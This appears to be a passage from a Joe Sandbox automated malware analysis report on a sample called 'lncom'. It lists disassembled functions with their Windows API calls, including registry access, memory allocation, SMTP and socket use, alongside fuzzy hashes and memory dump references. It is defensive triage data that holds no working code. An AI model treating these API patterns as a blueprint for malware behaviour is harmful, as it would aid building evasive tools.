Opcode Fuzzy Hash: e5d7b1f972ccec2067bb8b8df5f70f8d7aeeb774c8b0d0d46c680809e36908c9
Instruction Fuzzy Hash: 5301B170601200BFDB21EF56CC92BDA37ADDB09718F614466F9049B292D27DED44CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004925A0 Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,00000000,0046EA74,?,0040B22F), ref: 004925BD
GetCommandLineA.KERNEL32(?,?,00000000,0046EA74,?,0040B22F), ref: 004925CF

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CommandFileLineModuleName
String ID:
API String ID: 2151003578-0
Opcode ID: 79c8a6cb7b22d63a6445614d90d18214595c74523cc2287c5068df6ea365f9d3
Instruction ID: ff43024d46156d024a8fc68a86c9d282e65f89465f3ce6c37f3cf42eaf812724
Opcode Fuzzy Hash: 79c8a6cb7b22d63a6445614d90d18214595c74523cc2287c5068df6ea365f9d3
Instruction Fuzzy Hash: DDF0E56230060137DB5161AE4DA57AB25CD5BC8B35F56003BA244C73C1EEECCD4283AA

Uniqueness

Uniqueness Score: -1.00%

Function 00465B9C Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000FC), ref: 00465BA3
DestroyWindow.USER32(?,?,000000FC,?,?,0043A764), ref: 00465BAB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$DestroyLong
String ID:
API String ID: 2871862000-0
Opcode ID: 84198fa53b5aeab018d6a821785624540cec846d8c8519918a405cba4f60e1bb
Instruction ID: b88d5afc8dcff1b3811832cfc93f825f0a54aaf460b8143683a02a3c2b43e64b
Opcode Fuzzy Hash: 84198fa53b5aeab018d6a821785624540cec846d8c8519918a405cba4f60e1bb
Instruction Fuzzy Hash: 35C01241602A3136172432AE1CC28EB1048890236932806ABBB508A283EA4C0E4002FE

Uniqueness

Uniqueness Score: -1.00%

Function 0049117C Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00491485), ref: 004911AB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00491485), ref: 004911D2

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1872ede0cfa0d0c08c4d8a1af7864db9dc5fbbb4b19ec91caa2c9577458c7ab0
Instruction ID: f36e61c0da3e16b07704e4ec29db43ca40cb400aaf3b2d21a2be505867a34871
Opcode Fuzzy Hash: 1872ede0cfa0d0c08c4d8a1af7864db9dc5fbbb4b19ec91caa2c9577458c7ab0
Instruction Fuzzy Hash: FAF097B2B016216AEF20562B0C82B532ED4AF49B90F14003BFB0CEF3CCD6658C0182B8

Uniqueness

Uniqueness Score: -1.00%

Function 004A00F4 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000004,000000C8,?), ref: 004A0198

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0f49e945092bf086b621d904263b0ceac0ce16c53280b349e4474cb4ff62f620
Instruction ID: 0ef04a58905d190727453a179283068d6e797b37981b62e9e85b167436b9c406
Opcode Fuzzy Hash: 0f49e945092bf086b621d904263b0ceac0ce16c53280b349e4474cb4ff62f620
Instruction Fuzzy Hash: 76315E31A00209DFCB10DF58C9846EEB771FB56324F158296D4696B381C37AAE81CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00451A10 Relevance: 1.6, APIs: 1, Instructions: 50registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451A96,?,?,?), ref: 00451A7B

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5a171a9f3a556dd61a47aed34b152fd7d0d2e78fd62811f792664571c1848595
Instruction ID: 37c44878ec90820fb1bda6959e62811e96c7413f105a1136410320c279504053
Opcode Fuzzy Hash: 5a171a9f3a556dd61a47aed34b152fd7d0d2e78fd62811f792664571c1848595
Instruction Fuzzy Hash: 9301B575B006086FDB01EEA5CC51B9FB7ECDB49305F10417BB804D3392DA38AE448658

Uniqueness

Uniqueness Score: -1.00%

Function 0045198C Relevance: 1.5, APIs: 1, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?,00000000), ref: 004519B7

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0e4aff34450c25ec5f663e5902bedfc9f3974488635fe66e1eb618de6a74f0a7
Instruction ID: 6e062f52bd88d5a226f495ec72c22e86d3e34c7bcb81d56985a87010fc35359a
Opcode Fuzzy Hash: 0e4aff34450c25ec5f663e5902bedfc9f3974488635fe66e1eb618de6a74f0a7
Instruction Fuzzy Hash: 97012176600208AFDB00EE99DC81A9FB7AC9B59314F008167BD14D7352DA759E04C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0046E10C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 0046E0C4: GetWindowTextA.USER32(?,?,00000100), ref: 0046E0E7

SetWindowTextA.USER32(?,00000000), ref: 0046E156

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: e39eb6b656ef5abef2daeaf2f9e787871c251d9d585082188f4f275131fe4964
Instruction ID: 237ba2641dfaab3cd1f7356a49e38a6edbb74fd0467e2d2df472c711440568c8
Opcode Fuzzy Hash: e39eb6b656ef5abef2daeaf2f9e787871c251d9d585082188f4f275131fe4964
Instruction Fuzzy Hash: 7B01A278300644EBDB21EE66C842B9A37ECDB4E704F6144B7F81087357E67CEE01965A

Uniqueness

Uniqueness Score: -1.00%

Function 00451924 Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00451955

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 80f053c87000f9813c9796de57fcb0c409729be67a70006aedddbb219393fcb8
Instruction ID: d3a4c09debdf6f4ca63e00fb6731874adf2816dfc1a94b14ceafbe509119de57
Opcode Fuzzy Hash: 80f053c87000f9813c9796de57fcb0c409729be67a70006aedddbb219393fcb8
Instruction Fuzzy Hash: EEF08175A002087BC700EA9ADC81B9FFBEC9B49315F044066F918C7392D6359E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004448F8 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@$bdtr$qqrv.LNCOM ref: 00444960

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Client@$bdtr$qqrvCustomSmtpSmtpprot@
String ID:
API String ID: 2483820122-0
Opcode ID: 7665c1bad3688e9323527527db0474db9a82fb84079a39f097f9a6e7fd9f1504
Instruction ID: c32814e0d39faaf8af4ab7d772083fe595b450d3c78d4977c8fca8326052c59a
Opcode Fuzzy Hash: 7665c1bad3688e9323527527db0474db9a82fb84079a39f097f9a6e7fd9f1504
Instruction Fuzzy Hash: 92012D30904244EFDB04CB69C689ADDBBF2AF49314F5542F5E4049B3A1DB726F04DB04

Uniqueness

Uniqueness Score: -1.00%

Function 004679D4 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,00467A15), ref: 00467A05

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6a89a4f3df1806c00036fcefaf05d87c01fe64ac6ab3b26f051fd77a9306500d
Instruction ID: 691bfdad619de911fac409c7112639af19acf547f7f8cd2b73a65b909bde8261
Opcode Fuzzy Hash: 6a89a4f3df1806c00036fcefaf05d87c01fe64ac6ab3b26f051fd77a9306500d
Instruction Fuzzy Hash: 2EF0F630308304EFD701CF99E849A9EB7F8EB48718F3500B6E80887251E3356E00DA29

Uniqueness

Uniqueness Score: -1.00%

Function 004517B0 Relevance: 1.5, APIs: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,00403098), ref: 004517E2

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4d93873dbeab14de3b804c2884c8393a042706f6692690918bc1fead706af437
Instruction ID: 6c7dd041e130016d68cb77230eb6f0e6b84164fe606d5a13e8d2299f7b41bc9d
Opcode Fuzzy Hash: 4d93873dbeab14de3b804c2884c8393a042706f6692690918bc1fead706af437
Instruction Fuzzy Hash: 09F030723091446BD704EAAE9D41FAB6BDCDB89755F00813FF948C7242DA25DD088379

Uniqueness

Uniqueness Score: -1.00%

Function 00444884 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent.LNCOM ref: 004448A7

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Classes@Client@$bctr$qqrp18ComponentCustomSmtpSmtpprot@
String ID:
API String ID: 379933060-0
Opcode ID: 06ee9e917cceb3fafefe49541a111c2f5487c419aa1a6fe63697a487eb796733
Instruction ID: 2e0136ffe3eb73c3f796f33eccc01e3374ffc8b6dab6a378c6788c66a8b77565
Opcode Fuzzy Hash: 06ee9e917cceb3fafefe49541a111c2f5487c419aa1a6fe63697a487eb796733
Instruction Fuzzy Hash: 98016231D00148EBDB14DBA9CA82ACEB7F1AF49304F1442B9D91897751D7761F04DB89

Uniqueness

Uniqueness Score: -1.00%

Function 004386B4 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@$bdtr$qqrv.LNCOM ref: 00438707

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CustomSocket@$bdtr$qqrvWsocket@
String ID:
API String ID: 1988188524-0
Opcode ID: f5b584a5bdc1b7f0b5e1351f1930281151fe6abaca510500d619827aa9ae1d32
Instruction ID: fb0283d274934db6683de922344e4e86d29328e18b00526549420b44067a9382
Opcode Fuzzy Hash: f5b584a5bdc1b7f0b5e1351f1930281151fe6abaca510500d619827aa9ae1d32
Instruction Fuzzy Hash: 43014F30904208EFCB10DB69C586A9EB7F2AF88214F2582F5A4049B2A2DB755F40DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00478D70 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00478DA3

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 56fbc9f0b75d7883fab623fe96cb7948e06f4b5c370efd4bef91eaa9548fa66a
Instruction ID: fa3ca6978e7e04c4bfd1d7d10e7073b2e020009c331faada053b9634524e4335
Opcode Fuzzy Hash: 56fbc9f0b75d7883fab623fe96cb7948e06f4b5c370efd4bef91eaa9548fa66a
Instruction Fuzzy Hash: 74F0C5B6601510AFDB94DE9DD9C1E9377ECAB0D350B088596BA08CF20AD265EC508BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00475794 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 004757CF

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0daa64e1205751c5b3df7c19265a3fed8300186aeae3854a3639ff05b65d40a0
Instruction ID: 2aa09884c2b401f205d1de0dea0df72807603c37b64b084fcb45a4199c4e5229
Opcode Fuzzy Hash: 0daa64e1205751c5b3df7c19265a3fed8300186aeae3854a3639ff05b65d40a0
Instruction Fuzzy Hash: 4EF0F8362042019FC740DF5CC8C4C4ABBE9FF89255B4446A8F999CB366CB71E858CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00438644 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@$bctr$qqrp18Classes@TComponent.LNCOM ref: 00438667

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Classes@ComponentCustomSocket@$bctr$qqrp18Wsocket@
String ID:
API String ID: 2124790519-0
Opcode ID: 1aee69146390490f6400f70dbedc0b47d749e36002303b1a581c64c4bd74bae0
Instruction ID: 91419ebee60b412bfecc3efc04a249607521cb953fd53447d74cdfa0d9550c91
Opcode Fuzzy Hash: 1aee69146390490f6400f70dbedc0b47d749e36002303b1a581c64c4bd74bae0
Instruction Fuzzy Hash: 19F06271D04548EBCB00DB99C58279DBBB19F45314F1841F9E81497381DA7A5F108B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0045C780 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 0045C7B4

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
